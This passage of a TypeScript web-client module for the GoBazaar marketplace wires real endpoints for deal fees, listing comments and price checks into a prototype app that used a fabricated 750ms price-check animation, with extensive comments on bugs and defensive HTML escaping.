     one fetch this can produce is always the first OPEN — his listener is on the
     element and ours is capture-phase on the document, so we run before
     `summaryOpen` flips and cannot read it anyway. */
  const attemptedFees = new Set<string>();
  const loadFees = (threadId: string | null): void => {
    if (!threadId || attemptedFees.has(threadId)) return;
    /* 🪤 Checked BEFORE marking attempted. The offer id is stashed by the detail
       install, so a visitor who taps summary faster than that fetch returns would
       otherwise be marked as tried and never get fees at all. No id yet means
       "not ready", not "no fees" — leave it unmarked and let the next tap retry. */
    const ready = (
      win as unknown as { __gbzThreadOfferId?: (id: string) => string | null }
    ).__gbzThreadOfferId?.(threadId) ?? null;
    if (!ready) return;
    attemptedFees.add(threadId);
    installThreadFees(win, authFetch, threadId).catch((err) => {
      console.error(`[web-install] deals: fees for ${threadId} not installed:`, err);
    });
  };

  const onClick = (event: Event): void => {
    const target = event.target as Element | null;
    /* 🪤 TWO BUGS LIVED HERE, AND A PERSON WITH ONE DEAL CANNOT SHOW EITHER.
       Blake renders the toggle differently depending on which deal it belongs
       to (app.js:2623):

         <button class="summary-toggle"
           ${latest ? 'id="summary-toggle"' : `data-summarytoggle="${d.id}"`}>

       and his own comment at app.js:2596 states the rule out loud — "Only the
       person's LATEST deal keeps the #summary-toggle id (the tour and the fee
       loader look for it); the others toggle by attribute."

       1. MATCHING ONLY "#summary-toggle" MEANT OLDER DEALS NEVER FETCHED FEES.
          Their toggle carries no id, so this branch never ran for them, the
          click fell through to the [data-selthread] branch below, matched
          nothing useful, and no fee fetch was ever issued. The fee block is
          what makes a thread routable to checkout (app.js:3701 finds threads
          by `x.fees`), so an older deal could not be priced and could not be
          checked out. It failed silently — no warning, nothing in the console.

       2. EVEN WHEN IT DID RUN, IT FETCHED THE WRONG DEAL. currentThreadId()
          resolves the open THREAD ROW, whose data-selthread is `p.latest.id`
          (app.js:2514) — the person's LATEST deal. personThreads() groups deal
          rows by counterpart (app.js:2480-2483), so one person can hold several
          deals while the row names only the newest. Any non-latest toggle that
          had matched would still have priced the newest one.

       Both are fixed by reading the id off the block the visitor actually
       clicked. Every block carries it (app.js:2600, `data-dealblock="${d.id}"`,
       inside offerBlock so it is present on latest and non-latest alike), which
       is why that is preferred over the toggle's own attribute: it is one path
       for both shapes rather than a branch that has to stay in sync with which
       shape Blake chose.

       The ids line up: p.deals holds THREADS rows, so `d.id` IS a THREADS id,
       which is exactly what __gbzThreadOfferId matches on (floorTransport.ts:
       1807-1812). Passing a deal-scoped id here would have resolved to null and
       loadFees would have returned without a fetch — quietly, again.

       The two fallbacks are ordered, not decorative: the toggle's own attribute
       covers a block wrapper that changed shape, and currentThreadId() keeps the
       previous behaviour for the latest deal if both are gone. */
    const toggle = target?.closest?.("#summary-toggle, [data-summarytoggle]") as HTMLElement | null;
    if (toggle) {
      const block = toggle.closest("[data-dealblock]") as HTMLElement | null;
      loadFees(
        block?.dataset.dealblock ?? toggle.dataset.summarytoggle ?? currentThreadId(),
      );
      return;
    }
    // closest(), not the target itself: his row is a <button> containing an
    // avatar, spans and a badge, so the click almost always lands on a child.
    const row = target?.closest?.("[data-selthread], [data-gothread]") as HTMLElement | null;
    if (!row) return;
    load(row.dataset.selthread ?? row.dataset.gothread ?? null);
  };

  win.document.addEventListener("click", onClick, true);

  // The default-selected thread, whenever the deals view paints. An observer
  // rather than a one-shot: #/deals can be reached long after boot, and the
  // selection also changes under rerenderKeepScroll without a click we saw.
  const app = win.document.getElementById("app");
  const sweep = (): void => {
    load(currentThreadId());
  };
  sweep();
  const observer = app ? new MutationObserver(() => sweep()) : null;
  observer?.observe(app!, { childList: true, subtree: true });

  return () => {
    win.document.removeEventListener("click", onClick, true);
    observer?.disconnect();
  };
}

/** Relative-time label. The bucketing (m/h/d/w, no calendar dates once past
 *  a week) matches the app's own existing convention — mobile
 *  ListingCommentSection.tsx:101-111's timeAgo() — reused for consistency
 *  rather than invented fresh; the "ago" suffix is added on top to match
 *  Blake's own comment-copy style (data.js fixtures: "3h ago", "5d ago",
 *  "6d ago"), which the mobile convention omits. Pure and testable: `now`
 *  is a parameter, never read from Date.now() internally. */
export function timeAgo(iso: string, now: number = Date.now()): string {
  const diffMs = Math.max(0, now - new Date(iso).getTime());
  const mins = Math.floor(diffMs / 60000);
  if (mins < 1) return "just now";
  if (mins < 60) return `${mins}m ago`;
  const hrs = Math.floor(mins / 60);
  if (hrs < 24) return `${hrs}h ago`;
  const days = Math.floor(hrs / 24);
  if (days < 7) return `${days}d ago`;
  return `${Math.floor(days / 7)}w ago`;
}

/** Maps one comments-endpoint row onto Blake's shape. body/username are
 *  passed through unescaped — same rule mapListingRow's title/seller follow
 *  (Blake's own esc() applies at render time: renderDetail line 952
 *  `esc(c.text)`, line 951 `esc(c.by)`) — pre-escaping here would double-
 *  escape exactly the way the file header already warns against for URLs. */
export function mapCommentRow(row: ApiCommentRow, now: number = Date.now()): DemoComment {
  return {
    by: row.author.username,
    text: row.comment.body,
    when: timeAgo(row.comment.createdAt, now),
    likes: row.comment.upvotes ?? 0,
    ...(row.comment.id ? { id: row.comment.id } : {}),
    liked: row.likedByMe === true,
  };
}

/**
 * The same rows, as USERS entries — one per distinct author.
 *
 * WHY THIS EXISTS. `by` above is a handle Blake renders as a LINK
 * (`data-gouser`, app.js:176 / 231 / 953) and hands to `avatarHTML`. Both read
 * USERS, which held only floor sellers and deal counterparts — so for a
 * commenter who is neither, the @handle bounced to the home feed and the avatar
 * painted "?". Producing the comment and not producing its author was the gap.
 *
 * 🔑 IT IS THE SAME SHAPE AS mapDealCounterparts, ONE TIER RICHER. That mapper's
 * header explains why thin rows are honest rather than lazy, and every zero
 * below carries its justification unchanged. The difference is what the wire
 * affords: the deal-threads list gives id/username/avatar/createdAt, while
 * comments.ts:200 gives `{ id, username, avatar, traderLevel }` — so `level` is
 * a REAL value here where counterparts hardcode `""`, and `memberSince` is the
 * one that inverts (they have createdAt, we do not).
 *
 * FIELD BY FIELD, and nothing here is a guess:
 *   id           author.id, the real users.id — this is also what keeps a
 *                comment author addressable by ratingFixups' handle→id map
 *   handle       author.username, verbatim — no rename. The delivery path
 *                (__gbzMergeUsers) is FIRST-WRITE-WINS and never overwrites;
 *                a real author is safe from fixtures only because the boot
 *                wipe leaves nothing fixture-shaped in USERS before any
 *                merge can run (see the IDENTITY block near the top of the
 *                file) — so even an author literally named "blake" is just
 *                that real user, not a demo persona to disambiguate from
 *   avatar       safeUrl(author.avatar) — a real photo, and the whole reason
 *                the "?" goes away rather than merely becoming reachable
 *   level        author.traderLevel, exactly as mapSellerToUser takes it
 *                (`seller.traderLevel ?? ""`). notNull in the schema, so the
 *                `?? ""` is belt-and-braces against an older cached response
 *   initials     author.username.slice(0, 2).toUpperCase()
 *   memberSince  "" — users.createdAt is NOT joined by this select, and
 *                comment.createdAt is the COMMENT's timestamp, not a join date.
 *                Using it would render a stranger's first comment as the day
 *                they joined GoBazaar. `sellerMemberSince(undefined)` returns
 *                "" for exactly this case, and demoTextFixups' label gate
 *                already removes the orphaned "Member Since" chrome
 *   the rest     verbatim from mapDealCounterparts: trades/sales/followers/
 *                following are the honest UNKNOWN (null, not 0 — see
 *                mapSellerToUser's own comment for why), the gamification
 *                fields are honest zeros, including `lvl: 1` (required, not
 *                decorative — see mapSellerToUser)
 *
 * 🪤 `initials` COMES FROM A DIFFERENT SOURCE STRING THAN THE SELLER PATH, and
 * that is worth stating rather than discovering later. mapSellerToUser prefers
 * `(displayName || username)`; this select does not join displayName, so a
 * person with a displayName unlike their username gets different initials
 * depending on which producer reached them first. It is not new drift —
 * mapDealCounterparts already slices the username the same way — and the merge
 * is first-write-wins, so whoever has the richer row wins consistently. Widening
 * the select by one column would close it; that is a server change and this is
 * not the PR for it.
 *
 * Keyed by the DISPLAY handle, because that is what the bridge compares against
 * USERS and what Blake's markup emits. `Object.create(null)` and not `{}`:
 * api-server/src/lib/username.ts normalizes to [a-z0-9_.], which PERMITS
 * "__proto__" as a real username — on a plain object that key would silently
 * hit the prototype instead of becoming an entry.
 *
 * 🪤 IT UNLOCKS A SECOND ROUTE, named here because it is a new reachable
 * surface rather than because it is a defect. app.js:3709 gates
 * `#/exchange/<handle>` on the same `USERS[m[1]]` lookup, so a commenter also
 * becomes a valid exchange target for a signed-in visitor. It does not throw —
 * renderExchange and its helpers (app.js:2144-2254) read LISTINGS and
 * avatarHTML, never `USERS[handle]` bare — it opens an empty "Building a trade
 * with @them", which is the truthful state for someone with nothing on the
 * floor.
 */
export function mapCommentAuthors(rows: ApiCommentRow[]): Record<string, DemoUser> {
  const users: Record<string, DemoUser> = Object.create(null);
  for (const row of rows) {
    if (!row?.author?.username) continue;
    const handle = row.author.username;
    if (users[handle]) continue;
    users[handle] = {
      id: row.author.id,
      handle,
      avatar: safeUrl(row.author.avatar) || undefined,
      initials: row.author.username.slice(0, 2).toUpperCase(),
      level: row.author.traderLevel ?? "",
      memberSince: sellerMemberSince(undefined),
      /* HONEST UNKNOWN — same ruling and same reason as mapDealCounterparts'
         own trades/sales/followers/following just above: a comment row
         carries id/username/avatar/traderLevel and nothing else, so none of
         these four have a source here. null, not 0 — see mapSellerToUser's
         own comment for why the two are different claims. */
      trades: null,
      sales: null,
      bio: "",
      followers: null,
      following: null,
      ratings: 0,
      badges: [],
      lvl: 1,
      lvlKnown: false, // no points on this wire — see DemoUser.lvlKnown
      pts: 0,
      ptsNext: 0,
      streak: 0,
      points: "0 pts",
      pinned: [],
    };
  }
  return users;
}

/**
 * Lazy, per-navigation real comments for #/listing/:id — NOT part of the
 * boot-time installFloorListings batch above. Fetching comments for every
 * pre-loaded listing up front would reintroduce exactly the per-grid-card
 * cost recon 15 §3 Tier 1 ruled out (see mapListingRow's gap log); this is
 * one call, for the one listing a visitor is actually looking at.
 *
 * Hooks `window`'s own "hashchange" event — a SEPARATE listener, additive to
 * app.js's own (app.js:5300) and to WebInstallHost's cross-route guard,
 * neither of which this touches. hashchange (not a MutationObserver, the
 * mechanism linkFixups.ts uses for its own after-the-fact DOM edits) is the
 * right signal here because the question this answers — "did the visitor
 * land on a NEW listing id?" — is a NAVIGATION event, not a "did app.js just
 * repaint" event; using the same MutationObserver approach would mean
 * re-deriving the current id from the DOM on every unrelated repaint instead
 * of reading it once off location.hash.
 *
 * Mutates the specific LISTINGS row in place via the bridge's
 * __gbzSetListingComments (this ES module cannot reach LISTINGS by name —
 * see the file header), then calls the CURRENT window.render() — itself a
 * top-level `function` declaration in app.js and therefore a real,
 * re-callable window property (same fact blockAuthRoute's own comment
 * relies on for `route`) — so an already-open detail view repaints with the
 * real comments. Guarded to only repaint while the visitor is STILL on that
 * exact listing, so a fetch that resolves after they've navigated away
 * doesn't clobber whatever they're looking at now.
 *
 * Cached per id for the life of the tab (`fetched`) — a listing's comments
 * don't need re-fetching every time the same visitor revisits it within one
 * session. FAILS SILENTLY per-id on a network error (comments are additive
 * enrichment, not load-bearing the way LISTINGS itself is — a listing whose
 * comments never load still shows everything else real) but does NOT retry
 * automatically; a fresh navigation away and back re-enters route() but
 * `fetched` already has the id, matching this file's existing best-effort
 * posture (categoryCounts, collection-items) of "one attempt, silent
 * degrade, no background retry loop".
 *
 * Returns a teardown that removes the "hashchange" listener. WebInstall.tsx
 * (the only production call site) never invokes it — that boot is one-shot
 * for the life of the tab and this is deliberately the LAST, self-swallowed
 * step in its sequence, so it cannot be reached twice (see WebInstall.tsx's
 * boot effect). The teardown exists for callers that don't share that
 * invariant, in particular this file's own tests, which call this function
 * once per `it()` on the SAME shared jsdom `window` — without it, every test
 * after the first leaves a listener behind that fires (and fetches, and
 * calls whatever `window.render` a LATER test installed) during every
 * subsequent test in the describe block.
 */
export function installLiveListingComments(
  win: Window,
  authFetch: (input: RequestInfo | URL, init?: RequestInit) => Promise<Response>,
  /**
   * installFloorListings' handle→id map, MUTATED IN PLACE as comment authors
   * arrive — the same object installRatingFixups is holding, which is what
   * makes this work at all (applyRatingFixup reads `userIds[handle]` on every
   * pass, not once at install).
   *
   * 🔴 WITHOUT THIS, THE FIX PAINTS A FALSEHOOD. Blake's statsGrid hardcodes
   * the string "★ 4.9" (app.js:1362) — it is not read from the user object —
   * and ratingFixups is the only thing that ever overwrites it. On a handle it
   * has no id for it fails safe to "— / No ratings yet"… which is itself a
   * CLAIM, and a false one for a commenter who does have ratings. We have their
   * real users.id on the wire, so the honest move is to let the fetch happen.
   *
   * Optional so the existing callers and every test harness that does not care
   * about ratings keep working unchanged.
   */
  userIds?: Record<string, string>,
): () => void {
  const target = win as Window & {
    __gbzSetListingComments?: (id: string, comments: DemoComment[]) => boolean;
    __gbzMergeUsers?: (users: Record<string, DemoUser>) => number;
    __gbzListingRow?: (id: string) => { comments?: DemoComment[] } | null;
    render?: () => void;
  };
  const rawSetComments = target.__gbzSetListingComments;
  if (typeof rawSetComments !== "function") {
    throw new Error("installLiveListingComments: bridge script did not define window.__gbzSetListingComments");
  }
  // Re-bound to a definitely-typed const: referenced below inside a nested
  // .then() callback, where TS's control-flow narrowing of the guard above
  // does not reach (a plain closure over `target.__gbzSetListingComments`
  // would still type as possibly-undefined there).
  const setComments: (id: string, comments: DemoComment[]) => boolean = rawSetComments;

  const fetched = new Set<string>();

  /**
   * The row's thread as it stands, in a form a later look can compare against.
   *
   * 🔴 A READ THAT PREDATES A WRITE MUST NOT LAND ON TOP OF IT (adversarial
   * review 2026-09-10). This read goes out on arrival, but the thread is often
   * live before it returns: the card loader filled it on the page before, so the
   * hearts work at once. A vote writes the row IN PLACE (__gbzSetCommentLike),
   * and a post's refresh or the card loader ASSIGNS a new array. Either is newer
   * than this reply. Landing the reply anyway reset a confirmed like to the
   * server's older "not liked", and the next tap sent a real unlike.
   * cardComments.ts drops a stale reply on array identity alone, which is enough
   * there because it only fetches a thread nobody can vote on yet. Here the like
   * state has to be part of the stamp.
   */
  function threadStamp(id: string): { comments: unknown; likes: string } {
    const cs = target.__gbzListingRow?.(id)?.comments;
    return {
      comments: cs,
      likes: Array.isArray(cs) ? cs.map((c) => `${c.id ?? ""}:${c.likes ?? 0}:${c.liked === true ? 1 : 0}`).join("|") : "",
    };
  }

  function currentListingId(): string | null {
    const m = /^#\/listing\/(.+)$/.exec(win.location.hash);
    return m ? m[1] : null;
  }

  function maybeFetch(): void {
    const id = currentListingId();
    if (!id || fetched.has(id)) return;
    // A collection piece has no thread: the comments table keys on listings (see mapCollectionItemRow).
    if (id.indexOf("coll-") === 0) return;
    fetched.add(id);
    const before = threadStamp(id);
    authFetch(`/api/comments/${encodeURIComponent(id)}`)
      /* null on a refusal (a guest's 429 from the global limiter, a 5xx): it says
         nothing about the thread, so the row keeps what it already shows. An
         empty array here used to wipe a thread the card loader had filled. */
      .then((res) => (res.ok ? (res.json() as Promise<ApiCommentRow[]>) : Promise.resolve(null)))
      .then((rows) => {
        if (!rows) return;
        const now = threadStamp(id);
        if (now.comments !== before.comments || now.likes !== before.likes) {
          /* Newer than this reply, so it stands. A new array can be a whole thread
             this page has not painted (the card loader paints cards only), so
             repaint for that; a vote has already painted its own hearts. */
          if (now.comments !== before.comments && win.location.hash === "#/listing/" + id) target.render?.();
          return;
        }
        const comments = rows.map((r) => mapCommentRow(r));
        /* AUTHORS FIRST, COMMENTS SECOND, and the order is the point. The
           repaint below is what puts these @handles and avatars on screen, and
           both read USERS — merging after it would paint one frame of "?"
           avatars and dead links before the next render corrected them. The
           merge is a no-op for authors who are already sellers or counterparts,
           so this costs nothing in the common case. Best-effort like every
           other lazy installer: an older bridge without the accessor leaves the
           comments themselves working exactly as they did before. */
        const authors = mapCommentAuthors(rows);
        /* Ratings before the merge, so the tile has an id to fetch with the
           moment the profile it belongs to becomes reachable. Mutating the
           shared map rather than replacing it — installRatingFixups holds this
           exact object. */
        if (userIds) {
          for (const handle of Object.keys(authors)) {
            const id = authors[handle].id;
            if (id && !userIds[handle]) userIds[handle] = id;
          }
        }
        target.__gbzMergeUsers?.(authors);
        // setComments returns false when `id` isn't in LISTINGS at all (e.g.
        // the hash changed again before this resolved, or the id was never
        // installed) — in that case there is nothing to repaint.
        if (setComments(id, comments) && win.location.hash === "#/listing/" + id) {
          target.render?.();
        }
      })
      .catch(() => {
        // leave fetched.has(id) true — see the function's own doc comment
      });
  }

  win.addEventListener("hashchange", maybeFetch);
  maybeFetch(); // covers landing directly on #/listing/:id at boot, before any hashchange fires

  return () => win.removeEventListener("hashchange", maybeFetch);
}

/* ============================================================================
 * THE RUN BUTTON — Blake's 750ms fake, replaced with the real endpoint.
 * ==========================================================================*/

/** MOBILE'S EXACT STRING (hooks/usePriceCheck.ts:71), reused rather than
 *  re-written. Both clients fail the same way and should say the same thing;
 *  that they didn't is the class of bug mobile's own price-check attribution
 *  comment (app/listing/[id].tsx:688) already names. */
export const PRICE_CHECK_FAILURE_COPY = "Could not reach market data. Try again.";

/** The 401/403 state, which is NOT the failure state.
 *
 *  🔴 Telling a signed-out visitor "Could not reach market data" is a false
 *  statement about the CAUSE — market data was reachable, they were not
 *  authorised to ask for it — and it points them at retrying something that
 *  cannot succeed. The SERVER's answer is the only honest signal here, and that
 *  outlives its original reason: this used to say `store.authed` was "pinned
 *  false for everyone", which made the client flag unusable. The pin is off
 *  (see the bridge, and the ✅ note on store.authed there) — but a client flag
 *  still only knows whether a session EXISTS, never whether it is authorised
 *  for this call, which is what 401/403 actually answers. 403 is folded in with
 *  401 because the beta
 *  gate returns it, and "your account cannot do this yet" is the same
 *  auth-shaped message, not a network failure. */
export const PRICE_CHECK_SIGNIN_COPY = "Sign in to run a price check";

/* ── THE DEAD END (card 1218772841732114) ────────────────────────────────────
 * Since PR #738 the server answers a DETERMINISTIC failure with 422 and a body
 * of { error, code, retryable: false }: the market was reached and the answer
 * was unusable for this item (`unusable_market_estimate`), or the listing is
 * missing what a check needs (`missing_listing_fields`). `retryable: false` is
 * the server's word that the same question will not get a different answer
 * (priceVerifier.ts:84-86; its own note at :352-359 says the run is not
 * deterministic, so the promise is the server's, not ours): "Try again" is a
 * false promise there, and a run button under it invites a press that spends a
 * model call on a question already answered. Mobile learned the difference in
 * PR #742; these are ITS sentences
 * (hooks/usePriceCheck.ts:46-56), reused rather than re-written, and its rule:
 * the two codes carry different truths and must not share a sentence, and
 * "You set the number" is said only where the reader owns the price (the
 * wizard), never on someone else's listing. */
export const PRICE_CHECK_DEAD_END_MISSING_COPY = "This listing is missing the details we need to price it.";
export const PRICE_CHECK_DEAD_END_COPY = "No market data for this one yet.";
export const PRICE_CHECK_DEAD_END_OWNER_COPY = "No market data for this one yet. You set the number.";

/** Mobile's priceCheckDeadEndMessage, verbatim in effect. */
export function priceCheckDeadEndMessage(code: unknown, canSetPrice: boolean): string {
  if (code === "missing_listing_fields") return PRICE_CHECK_DEAD_END_MISSING_COPY;
  return canSetPrice ? PRICE_CHECK_DEAD_END_OWNER_COPY : PRICE_CHECK_DEAD_END_COPY;
}

/** The dead-end sentence for a 422, or null for any other answer. A 422 whose
 *  body will not parse is still a dead end: the status is the server's word,
 *  the code only picks the sentence. */
async function readPriceCheckDeadEnd(res: Response, canSetPrice: boolean): Promise<string | null> {
  if (res.status !== 422) return null;
  let code: unknown;
  try {
    const body = (await res.json()) as { code?: unknown } | null;
    code = body && typeof body === "object" ? body.code : undefined;
  } catch {
    code = undefined;
  }
  return priceCheckDeadEndMessage(code, canSetPrice);
}

/**
 * Real GOBAZAAR Price Check for #/listing/:id, replacing app.js:4308-4313:
 *
 *   $$("[data-runpc]").forEach((el) => el.addEventListener("click", () => {
 *     pcRun[id] = "running"; rerenderKeepScroll();
 *     setTimeout(() => { pcRun[id] = true; rerenderKeepScroll(); }, 750);
 *   }));
 *
 * — a 750ms wait animation in front of a value computed from the seller's own
 * asking price. Nothing is fetched. `pcRun[id] = true` is the single line that
 * puts app.js:825's fabricated {HIGH CONFIDENCE, PRICED FAIR, "Comparable
 * pieces cleared between …"} on screen.
 *
 * MECHANISM: a capture-phase click listener on `document`, the writeGuard
 * pattern (see writeGuard.ts's header for the full argument). His handler is
 * bound on the element in the target phase, so stopping the event on the way
 * down means it never runs — and unlike unbinding, this survives every one of
 * his 165 rerenderKeepScroll() calls, each of which re-runs wire() and
 * re-binds his listener to a brand-new element.
 *
 * 🪤 stopPropagation, not stopImmediatePropagation — same reason as the write
 * guard: we own other capture listeners on `document` and killing them to stop
 * one button would be a worse trade.
 *
 * WHAT IS SENT: `{ listingId }` only. The route resolves the rest of the
 * fields itself and PERSISTS the answer against the row (priceVerifier.ts:
 * 447), so the next visitor — including a signed-out one — gets it for free
 * through parseStoredPriceCheck instead of paying for another model call.
 *
 * SAFE ON CLICK: requireAuth plus a 20-per-15-min-per-user limiter sit in
 * front of the spend (routes/price-verify.ts:41), and the route serves from
 * cache and refreshes behind. This installer adds an in-flight set on top so
 * one impatient visitor cannot stack requests for the same listing.
 *
 * 🔴 XSS — every interpolation site in his panel, enumerated, not sampled.
 * app.js:874-902 has exactly six dynamic sites: `esc(pc.confidence)`,
 * `money(pc.min)`, `money(pc.max)`, `Math.round(...)` for the marker's
 * `left:` percentage, `esc(pc.verdict)`, and `esc(pc.reasoning)`. The three
 * string-valued ones all go through data.js:835's esc(), which replaces
 * & < > " ' — so the LLM-authored `reasoning` cannot break out of its text
 * node. The three numeric ones pass through money() (`Number(n)` then
 * toLocaleString) or Math.round, neither of which can emit markup, and
 * toDemoPriceCheck rejects any non-number before they are reached. `sources`
 * is model-returned and IS in the stored JSON — and has NO render site at all
 * (`grep -c sources public/web/app.js` = 0, likewise `grounded`), which is
 * why DemoPriceCheck does not carry it. No sanitising is needed at the mapper
 * and none is added; nothing here is ever rendered as an href, so safeUrl has
 * no site either.
 */
export function installPriceCheckRun(
  win: Window,
  authFetch: (input: RequestInfo | URL, init?: RequestInit) => Promise<Response>,
): () => void {
  const target = win as Window & {
    __gbzSetListingPriceCheck?: (id: string, priceCheck: DemoPriceCheck) => boolean;
    __gbzSetPriceCheckRunning?: (id: string, running: boolean) => void;
    __gbzListingPrice?: (id: string) => number | null;
    rerenderKeepScroll?: () => void;
  };
  const setPriceCheck = target.__gbzSetListingPriceCheck;
  const setRunning = target.__gbzSetPriceCheckRunning;
  const listingPrice = target.__gbzListingPrice;
  if (typeof setPriceCheck !== "function" || typeof setRunning !== "function" || typeof listingPrice !== "function") {
    throw new Error("installPriceCheckRun: bridge script did not define the price-check helpers");
  }

  const doc = win.document;
  const inFlight = new Set<string>();
  /** Listings the server has already called a dead end, with its sentence.
   *  A dead end is about the LISTING, not the click, and the server keeps no
   *  record of it (a failed run stores nothing), so this is the only memory:
   *  a later press on the same row is answered from here and spends no
   *  request. Only a 422 lands here, never a retryable failure. Gone with the
   *  page, which is right: a reload is a fresh ask, and the listing's fields
   *  cannot change under a viewer without one (an edit reloads). */
  const deadEnds = new Map<string, string>();

  /** Blake re-renders the whole view; this is his own scroll-preserving
   *  entry point (app.js:3863), a top-level function declaration and
   *  therefore a real window property. Optional-called for the same reason
   *  installLiveListingComments optional-calls window.render. */
  const repaint = (): void => target.rerenderKeepScroll?.();

  /** Writes a one-line status into the pre-run panel's own copy slot.
   *
   *  Deliberately transient: it lives until Blake's next render, which is
   *  correct — a message about a click that has already been answered must
   *  not outlive the view it was answered in. It is written AFTER repaint()
   *  (rerenderKeepScroll is synchronous), so it lands on the fresh DOM rather
   *  than on the node the repaint is about to discard.
   *
   *  The button is found by walking `[data-runpc]` and comparing the
   *  attribute, not by building an attribute selector out of the id — the id
   *  is server data and does not belong in a selector string. */
  const paintStatus = (id: string, message: string): void => {
    for (const btn of Array.from(doc.querySelectorAll("[data-runpc]"))) {
      if (btn.getAttribute("data-runpc") !== id) continue;
      const reason = btn.closest(".pricecheck")?.querySelector(".pc-reason");
      // textContent, never innerHTML: these are our own constants today, and
      // keeping the write incapable of parsing markup means it stays safe if
      // a future caller passes something less controlled.
      if (reason) reason.textContent = message;
      return;
    }
  };

  /** The dead-end sentence in the reason slot, and the run button GONE: a
   *  button under "no market data for this one" invites a press that returns
   *  the identical answer. Transient like paintStatus (his next render brings
   *  the button back), which is why deadEnds above answers the next press. */
  const paintDeadEnd = (id: string, message: string): void => {
    for (const btn of Array.from(doc.querySelectorAll("[data-runpc]"))) {
      if (btn.getAttribute("data-runpc") !== id) continue;
      const reason = btn.closest(".pricecheck")?.querySelector(".pc-reason");
      if (reason) reason.textContent = message;
      btn.remove();
      return;
    }
  };

  const onClick = (event: Event): void => {
    const el = (event.target as Element | null)?.closest?.("[data-runpc]");
    if (!el) return;
    // Suppress his fake flow FIRST, before any early return below — a click
    // we decline to service must still not fall through to the fabrication.
    event.stopPropagation();
    event.preventDefault();

    // A guest gets the sign-in wall and no request — see guestWall.ts. The 401
    // branch below stays for a session that expired under a signed-in page.
    if (!signedInOrWall(win)) return;
    const id = el.getAttribute("data-runpc");
    if (!id || inFlight.has(id)) return;
    const known = deadEnds.get(id);
    if (known !== undefined) {
      paintDeadEnd(id, known);
      return;
    }
    inFlight.add(id);

    // Honest now: his "Checking the floor and recent comps…" copy describes a
    // request that is actually outstanding.
    setRunning(id, true);
    repaint();

    const finish = (message: string | null): void => {
      inFlight.delete(id);
      // Clears "running" back to the pre-run button. NEVER pcRun[id] = true
      // on this path — that flag with no real priceCheck on the row is
      // precisely how the fabricated verdict renders.
      setRunning(id, false);
      repaint();
      if (message) paintStatus(id, message);
    };

    authFetch("/api/listings/price-verify", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ listingId: id }),
    })
      .then(async (res) => {
        if (res.status === 401 || res.status === 403) {
          finish(PRICE_CHECK_SIGNIN_COPY);
          return;
        }
        // A viewer is not setting anyone's price: the sentence without "You set the number".
        const deadEnd = await readPriceCheckDeadEnd(res, false);
        if (deadEnd !== null) {
          deadEnds.set(id, deadEnd);
          finish(null);
          paintDeadEnd(id, deadEnd);
          return;
        }
        if (!res.ok) {
          finish(PRICE_CHECK_FAILURE_COPY);
          return;
        }
        const price = listingPrice(id);
        // The row is gone (navigated away and the floor reinstalled), or the
        // 200 body is not a price check. Both mean there is nothing true to
        // paint, and the fabrication is the only alternative, so: fail.
        const mapped = price === null ? null : toDemoPriceCheck(await res.json(), price);
        if (!mapped || !setPriceCheck(id, mapped)) {
          finish(PRICE_CHECK_FAILURE_COPY);
          return;
        }
        inFlight.delete(id);
        repaint();
      })
      .catch(() => finish(PRICE_CHECK_FAILURE_COPY));
  };

  doc.addEventListener("click", onClick, true);
  return () => doc.removeEventListener("click", onClick, true);
}

/* ============================================================================
 * THE WIZARD'S TWIN — the same fabrication, one screen earlier (F6).
 * ==========================================================================*/

/** data.js:830's `money`, mirrored rather than called.
 *
 *  It is a top-level `const` in a classic script, so it is a lexical binding
 *  this module cannot name — the same wall bridgeScriptSource exists to get
 *  around. A bridge accessor would work; mirroring is preferred here for the
 *  same reason priceCheckAttributionLabel mirrors mobile's rule instead of
 *  importing it: the logic ends up somewhere typed and unit-tested. The
 *  mirror is pinned to his real function by an execution test that runs both
 *  over the same inputs, so a format drift is a red, not a surprise. */
function moneyText(n: number): string {
  const opts = Number.isInteger(n)
    ? { maximumFractionDigits: 0 }
    : { minimumFractionDigits: 2, maximumFractionDigits: 2 };
  return "$" + n.toLocaleString("en-US", opts);
}

/** data.js:835's `esc`, mirrored for the same reason and pinned the same way.
 *
 *  🔴 LOAD-BEARING. `reasoning` is LLM-authored prose from priceVerifier and
 *  `sources` is a model-returned array of marketplace names; both land in the
 *  panel this file builds with innerHTML. Blake's own reveal panel routes
 *  every string interpolation through esc() (app.js:878, 888, 889) and ours
 *  must too, or our honest panel is a worse bug than the dishonest one. */
function escHtml(s: string): string {
  return s.replace(/[&<>"']/g, (c) =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" })[c] as string,
  );
}

/** Mobile's create-flow gate, and its three messages, VERBATIM.
 *
 *  Gate: `title.trim().length >= 3 && description.trim().length > 0`
 *  (mobile/app/(tabs)/create.tsx:997). The messages are that screen's own
 *  (create.tsx:2069, 2079, 2147) — not paraphrased, not shortened to fit one
 *  line. Inventing copy for a failure state is the same class of mistake as
 *  the toasts this batch is suppressing: the wording IS the product decision,
 *  and mobile already made it.
 *
 *  Precedence follows mobile's own `scrollToField(title.trim().length < 3 ?
 *  'title' : 'description')` — title first, then description. */
export const WIZ_PC_TITLE_MISSING_COPY = "Add a title to run the price check.";
export const WIZ_PC_TITLE_SHORT_COPY = "Title needs at least 3 characters.";
export const WIZ_PC_DESCRIPTION_MISSING_COPY = "Add a description to run the price check.";

export function wizardPriceCheckGate(title: string, description: string): string | null {
  const t = title.trim();
  if (t.length === 0) return WIZ_PC_TITLE_MISSING_COPY;
  if (t.length < 3) return WIZ_PC_TITLE_SHORT_COPY;
  if (description.trim().length === 0) return WIZ_PC_DESCRIPTION_MISSING_COPY;
  return null;
}

/** The create-flow draft, as the bridge hands it over. */
export interface WizardDraft {
  title: string;
  description: string;
  category: string | null;
  declaredValue: number;
  condition: string | null;
  brand: string;
  /** True only when the seller picked a grading company other than Raw AND a grade. */
  graded?: boolean;
  grader?: string | null;
  grade?: number | null;
}

/**
 * Real GOBAZAAR Price Check for the LISTING WIZARD, replacing app.js:4871:
 *
 *   $("#wz-runpc")?.addEventListener("click", () => {
 *     wzPcState = "running"; rerenderKeepScroll();
 *     setTimeout(() => { wzPcState = "done"; rerenderKeepScroll(); }, 750);
 *   });
 *
 * — the listing page's fake (installPriceCheckRun above) with the serial
 * numbers filed off, and slightly worse. app.js:1613 computes the "market"
 * band as `round(v * 0.85)` to `round(v * 1.15)` from the number the SELLER
 * JUST TYPED, badges it HIGH CONFIDENCE, prints ◈ PRICED FAIR, and explains
 * itself with "Comparable pieces cleared between $X and $Y in the last 90
 * days. Your number sits right in the pocket."
 *
